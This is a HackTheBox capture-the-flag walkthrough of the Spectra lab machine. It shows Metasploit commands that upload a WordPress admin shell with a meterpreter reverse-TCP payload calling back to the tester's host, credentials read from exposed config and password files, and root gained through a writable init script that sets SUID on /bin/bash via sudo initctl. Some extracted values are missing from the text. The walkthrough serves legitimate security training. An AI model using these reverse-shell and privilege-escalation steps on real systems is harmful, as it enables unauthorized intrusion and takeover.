Spectra HackTheBox WalkThrough
This is Spectra HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted to
Spectra HTB machine. Before starting let us know something about this machine. It is a
Linux OS box (which I came to know after rooting) with IP address
10.10.10.229 and difficulty
easy assigned by its maker.
Also, connect your PC with
HackTheBox VPN and make sure your connectivity with
Spectra machine by pinging its IP 10.10.10.229. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap (port scanner) for this task and the result is below:-
$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229
Full TCP scan with Nmap found ports
3306 as open.
OpenSSH Server on port
Nginx Web Server on port
MySQL Database Server on port
3306 is running.
OpenSSH 8.1 is not affected with any serious vulnerability so I left it for enumeration later when I would get some credentials. Since Web Server is running on port 80 so there should be some website hosted over it and it can be accessed at URL http://10.10.10.229.
After going to this URL found a simple
HTML web page and some links namely
Software Issue Tracker and
Test. Both these links revealed a Virtual Host
spectra.htb. So before accessing them let us add
spectra.htb to our
hosts file. hosts file is present in the directory
Host File After Modification
$ cat /etc/hosts
After going to URL http://spectra.htb/main/ found that
WordPress is installed in
/main folder with its default theme. Then I pressed
CTRL+U to check the
source-code of this page. After checking the source-code found its version as
A quick google search revealed that this version in not affected with any serious vulnerability that would help us in further enumeration. After going to URL http://spectra.htb/testing/index.php found another instance of WordPress installed there and there is some
database connectivity issue due to which it is not showing home page. But there is
enabled and you can check all its files through the URL http://spectra.htb/testing.
After some initial enumeration got file
wp-config.php.save. It contains some credentials. You can only see its content when you see its
page-source. Here is the URL of page
From above extracted credential is
When I tried to login at http://spectra.htb/main/wp-login.php with creds
devteam01 it says wrong credential. But when I tried to use the credential
devteam01, it logged in successfully. I think this is the reason that database connectivity issue is present at http://spectra.htb/testing/.
devtest should be replaced with
administrator in above config file for proper connectivity. Anyway, let us get user shell using this creds.
There are multiple ways by which you can get user shell when you get WordPress login credentials. The ways are
1. Upload Shell through Add Theme option.
2. Upload Shell through Add Plugins option.
3. Shell upload into 404.php file of theme.
4. Using pre-installed Plugins into header.php
5. Use metasploit module
exploit/unix/webapp/wp_admin_shell_upload to upload and get shell.
I am going to use 5th way that is using metasploit. To get user shell follow the given steps.
Getting User Shell
msf6 > search wp_admin
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have successfully got user shell with user privilege
nginx. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
meterpreter > shell
~python3 -c 'import pty;pty.spawn("/bin/bash")'
We have successfully upgraded the shell. When I tried to capture user flag from
/home/katie/ it gave me access denied permission because user nginx don’t have permission to access
user.txt file. We have to find credential of user katie by which we can upgrade this shell to Katie’s privilege shell.
After some enumeration found file
/opt/ directory. This file contains the path of passwd file which contains actual credential. The complete path is
$ cat /opt/autologin.conf.orig
$ cat /etc/autologin/passwd
passwd file has some credential. When I tried to use it with the katie SSH cred it worked. So we have SSH credential of user katie.
Let us login into katie’s account and capture user flag.
Login Into Katie’s Account
$ ssh [email protected]
$ whoami && id
We have successfully logged in as katie. Let us capture user flag.
Capture User Flag
$ cat user.txt
To escalate privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l command revealed that user katie can run
$initctl command as root user privilege.
This can be our Potential PrivEsc Vector. When I tried to get root shell by exploiting this excess right given to user katie I could get root shell easily. So here our potential privilege escalation vector is getting root by
Sudo Right Exploitation.
Let us understand how it works. So
$initctl is a tool that is used to start and stop
init daemon (server) or we can say it controls all init daemons running in the system. Check this link for more info. All init daemons’
configuration files are present inside directory
/etc/init/. If we can anyhow change any of these configuration files then we can start its init daemon using
$initctl command for executing this config file. Since
$initctl command is executed by root privilege therefore our code inside this configuration file will also be executed as root and we would get root shell.
So to get root shell I have modified an init daemon configuration file
test.conf inside the the directory
/etc/init/ since other users can read/write this file. I have replaced content inside
end script with my shell code.
script chmod +s /bin/bash end script
After making changes save the file and start the daemon using
$sudo command as given below and follow the below steps. Do this process as soon as possible because content of modified file will be replaced with the previous file content. If all goes correct you will definitely upgrade your shell to root shell.
Getting Root Shell
$ sudo -l
$ ls -la /etc/init | grep test
$ vi /etc/init/test.conf
$ cat /etc/init/test.conf
$ sudo /sbin/initctl start test
$ /bin/bash -p
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted Spectra HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].